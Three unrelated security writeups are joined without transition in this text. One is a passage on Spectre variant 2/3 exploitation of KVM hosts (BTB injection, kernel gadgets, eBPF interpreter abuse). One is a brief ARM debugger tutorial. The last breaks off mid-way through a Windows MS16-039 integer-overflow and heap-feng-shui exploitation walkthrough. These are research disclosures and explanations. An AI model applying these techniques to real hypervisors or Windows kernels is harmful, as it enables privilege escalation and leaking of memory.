Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.
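
The candidate counts quoted for kvm.ko and vmlinux follow directly from the ranges and alignments given in the text. The short calculation below only restates that arithmetic; the constant names are chosen for illustration.

```python
PAGE = 0x1000
KVM_RANGE = 0xffffffffc4000000 - 0xffffffffc0000000
FOLDED_BITS = 4   # from the text: 2**4 - 1 = 15 aliases per source address

kvm_candidates = KVM_RANGE // PAGE                        # page-aligned load addresses
kvm_distinguishable = kvm_candidates // 2**FOLDED_BITS    # non-aliasing sources to scan
aliases_left = 2**FOLDED_BITS                             # resolved later by bisection

MIB, GIB = 1 << 20, 1 << 30
vmlinux_candidates = (1 * GIB) // (2 * MIB)               # 1GiB range, 2MiB alignment

print(hex(kvm_candidates), kvm_distinguishable, aliases_left, vmlinux_candidates)
# prints: 0x4000 1024 16 512
```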

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages. To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

To brute-force the physical address, the following gadget can be used:

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 (the physical address guess minus 0xf8) is added to the result of the previous load, 0xf8 is added to it, and the result is dereferenced.
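
The register setup for this gadget is plain address arithmetic, sketched below. The displacement and the 0xf8 offset are taken from the disassembly above; the address of page_offset_base, the physmap base and the physical address guess used in the example are made-up values, and `read_qword` is a hypothetical callback standing in for kernel memory.

```python
U64 = (1 << 64) - 1
TABLE_BASE = (-0x7e594c40) & U64    # displacement in the gadget, sign-extended


def sext32(value: int) -> int:
    """Sign-extend a 32-bit value, as `movsxd r15,r9d` does."""
    value &= 0xffffffff
    return value - (1 << 32) if value & 0x80000000 else value


def r9_for(target: int) -> int:
    """R9D value that makes the first load read the 8-byte-aligned `target`."""
    delta = target - TABLE_BASE
    if delta % 8:
        raise ValueError("target must be 8-byte aligned relative to the table")
    index = delta // 8
    if not -(1 << 31) <= index < (1 << 31):
        raise ValueError("target is out of reach of a sign-extended 32-bit index")
    return index & 0xffffffff


def gadget_load_address(r8: int, r9: int, read_qword) -> int:
    """Address dereferenced by the final `mov r12,[r8+rax*1+0xf8]`."""
    rax = r8                                        # mov rax,r8
    r15 = sext32(r9)                                # movsxd r15,r9d
    loaded = read_qword((TABLE_BASE + r15 * 8) & U64)
    return (loaded + rax + 0xf8) & U64


# Made-up example values, for illustration only.
PAGE_OFFSET_BASE_SYM = 0xffffffff81c00000
PHYSMAP = 0xffff880000000000
memory = {PAGE_OFFSET_BASE_SYM: PHYSMAP}
guess = 0x12345000

addr = gadget_load_address(guess - 0xf8, r9_for(PAGE_OFFSET_BASE_SYM), memory.__getitem__)
print(hex(addr))
```

With R8 set to the guess minus 0xf8, the final load lands on the physmap base plus the guessed physical address, which is the host-virtual alias that the brute-force step probes.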

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

The eBPF interpreter provides, among other things:

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.
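
What such bytecode has to compute is small: read a byte, shift and mask out one bit, and use that bit to pick which of two attacker-visible cache lines gets loaded. The model below is not eBPF and touches no real cache; the `cache` set, the `STRIDE` spacing and all function names are assumptions made for illustration.

```python
CACHE_LINE = 64
STRIDE = 0x800      # hypothetical spacing between the two probe lines


def speculative_leak(secret_byte: int, bit: int, probe_base: int, cache: set) -> None:
    """Model of the leaking code: read, shift, mask, then one dependent load."""
    selected = (secret_byte >> bit) & 1
    address = probe_base + selected * STRIDE
    cache.add(address // CACHE_LINE)        # the load pulls this line into the cache


def reload_bit(probe_base: int, cache: set) -> int:
    """Stand-in for the timing check: which probe line is cached?"""
    hit0 = probe_base // CACHE_LINE in cache
    hit1 = (probe_base + STRIDE) // CACHE_LINE in cache
    if hit0 == hit1:
        raise RuntimeError("inconclusive measurement")
    return int(hit1)


def leak_byte(secret_byte: int, probe_base: int = 0x10000) -> int:
    """Leak one byte, one bit per flush/leak/reload round."""
    value = 0
    for bit in range(8):
        cache = set()                       # flush: both probe lines start uncached
        speculative_leak(secret_byte, bit, probe_base, cache)
        value |= reload_bit(probe_base, cache) << bit
    return value


print(hex(leak_byte(0xA5)))
```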

Variant 3: Rogue data cache load

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

We do have a few additions to make to Anders Fogh’s blogpost:

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 2^(31-8) or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

The following statements were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available at http://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpg, Release, Packages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 2^15 mappings would be more efficient, but the kernel places a hard cap of 2^16 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

#include <iostream>

int main(void) {
    // The double whose in-memory and in-register value we will inspect
    double myNumber = 1337.77;

    std::cout << myNumber << std::endl;

    return 0;
}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see the strd r2, [r11, #-12] instruction, and we have to fully understand what it does: it stores the 64-bit value held in the r2 and r3 register pair into memory at offset -12 from register r11. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset, specifically at address 0x7efff230 in memory.
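
To see why a pair of 32-bit registers is involved, it helps to look at how the double is laid out in memory. The sketch below assumes a little-endian ARM target (the usual case on Linux), where the low word sits at the lower address; the variable names are chosen for illustration.

```python
import struct

value = 1337.77
raw = struct.pack("<d", value)               # 8 bytes, little-endian IEEE 754
low_word, high_word = struct.unpack("<II", raw)

print(f"low  word: {low_word:#010x}")        # stored at the lower address
print(f"high word: {high_word:#010x}")       # stored 4 bytes above it

# Putting the two words back together gives the original double.
restored = struct.unpack("<d", struct.pack("<II", low_word, high_word))[0]
print(restored)
```

The high word carries the sign, the 11-bit exponent and the top of the mantissa, so changing either word changes the number that is eventually printed.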

Let’s step twice, which executes vldr d0, [r11, #-12]. As we understand it, 1337.77 is now loaded into d0, a double-precision register of the floating-point coprocessor. Let’s now print the value in that register below.

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

MS16-039 — «Windows 10» 64 bits Integer Overflow exploitation by using GDI objects

On April 12, 2016 Microsoft released 13 security bulletins.
Let’s talk about how I triggered and exploited CVE-2016-0165, one of the vulnerabilities fixed by MS16-039.

Diffing Stage

For MS16-039, Microsoft released a fix for all Windows versions, both 32-bit and 64-bit.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 and CVE-2016-0167.

Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».

ms16-039-diff

Interestingly, this function has been exported since Windows 10, when «win32k.sys» was split into 3 parts: «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».

If we look at the diff between the old and the new function version, we can see on the right side that in the first red basic block (left-top), there is a call to the «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.

In the second red basic block (right-down) there is a call to the «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.

Summing up, two integer overflows were patched in the same function.

ms16-039-fdiff

Understanding the fix

If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:

"lea ecx,[rax+rax*2]"

In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).

At the same time, we can see that the number of structs is held in a 64-bit register, but the destination of this calculation is a 32-bit register!

Now that we know it’s an integer overflow, the only thing left to find out is which number multiplied by 3 gives a result bigger than 4GB.
The idea is that this result can’t be represented by a 32-bit number.

A simple way to find it is the following calculation:

(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)

Now, if we multiply this result by 3, we obtain the following:

 0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes

In the same basic block, two instructions below («shl ecx,4»), we can see that the number «2» obtained previously is shifted left by 4 bits, which is the same as multiplying it by 16, resulting in the value 0x20.

So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂
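
The arithmetic above can be replayed with a short Python sketch. It only models the two instructions quoted in the text («lea ecx,[rax+rax*2]» and «shl ecx,4»); the name «alloc_size_32» is made up for illustration and is not part of any Windows component.

```python
MASK32 = 0xFFFFFFFF

def alloc_size_32(point_count):
    """Model the size computed before the patch, truncated to 32 bits."""
    ecx = (point_count * 3) & MASK32   # lea ecx,[rax+rax*2]
    ecx = (ecx << 4) & MASK32          # shl ecx,4
    return ecx

print(hex(alloc_size_32(0x55555556)))  # 0x20
```

Any smaller count that does not wrap gives the expected size, for example 100 POINTs yields 4800 bytes.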

Path to the vulnerability

For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls the vulnerable function directly.

NtGdiPathToRegion

From user space, this function is located in «gdi32.dll», where it’s exported as «PathToRegion».

Triggering the vulnerability

Now that we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability. But is it possible to reach this number of POINTs?

In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo».

Looking at the documentation, we see this definition:

BOOL PolylineTo(
 _In_ HDC hdc,
 _In_ const POINT *lppt,
 _In_ DWORD cCount
 );

The second argument is a POINT struct array and the third one is the array size.

It’s easy to think that if we create 0x55555556 structs and pass them as a parameter we will trigger the vulnerability, but WE WON’T. Let’s see why.

If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».

PolylineTo

«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.

If we look at this function, there is a check on the number of POINT structs passed as argument:

NtGdiPolyPolyDraw

The maximum number of POINTs that we can pass as a parameter is 0x4E2000.

It’s clear that there is no direct way to reach the number needed to trigger this vulnerability, so what is the trick?

Well, after some tests, the answer was pretty simple: «call PolylineTo many times until the wanted number of POINT structs is reached».

And the result was this:

ms16_039-bad-pool

The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.
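
As a rough sketch of how many calls that takes, the Python snippet below splits the target count into batches. It assumes the 0x4E2000 limit is inclusive and that every call adds exactly «cCount» points to the path; both are simplifications, and «plan_calls» is a hypothetical helper name.

```python
MAX_POINTS_PER_CALL = 0x4E2000   # limit checked by NtGdiPolyPolyDraw (from the text)
TARGET_POINTS = 0x55555556       # total needed to wrap the 32-bit size

def plan_calls(target, per_call):
    """Return the list of cCount values for successive PolylineTo calls."""
    full, rest = divmod(target, per_call)
    return [per_call] * full + ([rest] if rest else [])

counts = plan_calls(TARGET_POINTS, MAX_POINTS_PER_CALL)
print(len(counts), hex(counts[-1]))
```

Under these assumptions the total is reached with a few hundred calls, which is consistent with the approach being practical.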

PALLOCMEM2 function — «Bonus Track»

Triggering this vulnerability is relatively easy on 64 bit targets like Windows 8, 8.1 and 10.
On «Windows 7» 64 bits, however, the vulnerability is very difficult to exploit.

Let’s see the vulnerable basic block and the memory allocator function:

ms16-039-w7-io1

The destination of the multiplication by 3 is a 64 bit register (rdx), not a 32 bit register as in the Windows versions mentioned before.

The only feasible way to produce an integer overflow is with the previous instruction:

ms16-039-w7-io2

In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to exhaust kernel memory than to allocate this number of structures.

Now, why is Windows 7 different from the latest Windows versions?

Well, if we look at the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».

What is the difference?

The «PALLOCMEM2» function receives a 32 bit size argument, but the «__imp_ExAllocatePoolWithTag» function receives a 64 bit size argument.
The argument type defines how the result of the multiplication is passed to the allocator function. With «PALLOCMEM2», the result is cast to «unsigned int».

We could guess that functions that called «__imp_ExAllocatePoolWithTag» in Windows 7 and now call «PALLOCMEM2» have become exposed to integer overflows that are much easier to exploit.
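
The effect of the parameter width can be illustrated with a small Python model. It assumes the Windows 7 code applies the same x3 and x16 factors as the newer versions (the text only confirms the 64 bit multiplication by 3), and «size_argument» is a hypothetical name.

```python
def size_argument(point_count, arg_bits):
    """Size as seen by an allocator whose size parameter is arg_bits wide."""
    size = point_count * 3 * 16            # x3 then x16, as in the text
    return size & ((1 << arg_bits) - 1)    # truncation to the parameter width

count = 0x55555556
print(hex(size_argument(count, 32)))  # 0x20
print(hex(size_argument(count, 64)))  # 0x1000000020
```

With a 64 bit size the request is simply huge rather than tiny, so the allocation would be expected to fail instead of producing an undersized buffer.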

Analyzing the heap overflow

Once we trigger the integer overflow, we have to understand what the consequences are.

As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».

heap_overlfow_callgraph

This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.

It’s intuitive to think that, if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that would destroy a big part of the Windows kernel heap, which would quickly give us a BSoD.

What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the vulnerable function.

The trick here is that POINT structs are copied only when their coordinates ARE NOT REPEATED.
E.g.: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.

Thus, it’s possible to control exactly how many structures will be used by the heap overflow.
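
A simplified Python model of that rule is shown below. It assumes the filtering applies to consecutive points, which the text does not state explicitly, and it ignores whatever else «bConstructGET» and «AddEdgeToGet» do; «points_copied» is a hypothetical name.

```python
def points_copied(points):
    """Count points that survive when consecutive repeats are dropped."""
    copied = 0
    previous = None
    for point in points:
        if point != previous:
            copied += 1
        previous = point
    return copied

filler = [(30, 40)] * 1000          # repeated coordinates, collapsed into one
payload = [(1, 2), (3, 4), (5, 6)]  # distinct coordinates, each one copied
print(points_copied(filler + payload))  # 4
```

In this model the filler inflates the total count that drives the allocation size, while only the distinct points determine how much is written.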

Some exploitation considerations

One of the most important things to know before starting to write the exploit is that the vulnerable function allocates memory and produces the heap overflow, but when it finishes it frees the allocated memory, since this memory is used only temporarily.

ms16_039-alloc-free

It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.

Unfortunately, only some of the values to be overwritten are fully controlled by us, so we are not able to overwrite the next chunk header with its original content.

On the other hand, we can think of the alloc/free operation as «atomic», because we don’t get control of execution until the «PathToRegion» function returns.

So, how is it possible to successfully exploit this vulnerability?

Four years ago I explained something similar in the «The Big Trick Behind Exploit MS12-034» blogpost.

Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.

So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained by the second memory page will be corrupted but, we will avoid a BSoD when the allocated memory is freed.

Finding the best memory allocator

Given the above, it’s now necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.

ms16-039-chunk

When a heap spray requires several iterations, meaning that memory chunks are allocated and freed many times, the technique is called «Heap Feng Shui», in reference to the ancient Chinese practice (https://en.wikipedia.org/wiki/Feng_shui).

The POOL TYPE used by the vulnerable function is 0x21, which in Microsoft’s «POOL_TYPE» enumeration corresponds to «PagedPoolSession» («NonPagedPoolSession» + 1).

Knowing this, it’s necessary to find a function that allows us to allocate memory in this pool type with the best possible accuracy.

The best way that I have found to heap spray the pool type 0x21 is via the undocumented «ZwUserConvertMemHandle» function, located in «gdi32.dll» and «user32.dll».

ZwUserConvertMemHandle

When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».

If we look at the «ConvertMemHandle» code, we can see the perfect allocator:

ConvertMemHandle

Basically, this function receives two parameters, BUFFER and SIZE, and returns a HANDLE.

If we only look at the yellow basic blocks, we can see that the «ConvertMemHandle» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk and it will stay there until it’s freed.

To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard».

Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.

Choosing GDI objects to be overwritten

Now that we know how to make a good Heap Feng Shui, we need to find something interesting to be corrupted by the heap overflow.

Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.

In that blogpost he described how GDI objects are composed:

typedef struct
 {
   BASEOBJECT64 BaseObject;
   SURFOBJ64 SurfObj;
   [...]
 } SURFACE64;

As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».

In my case, the problem is that I don’t control all the values to be overwritten by the heap overflow, so I can’t overwrite this property with a USEFUL ADDRESS.

A variant of abusing GDI object

Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.

After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.

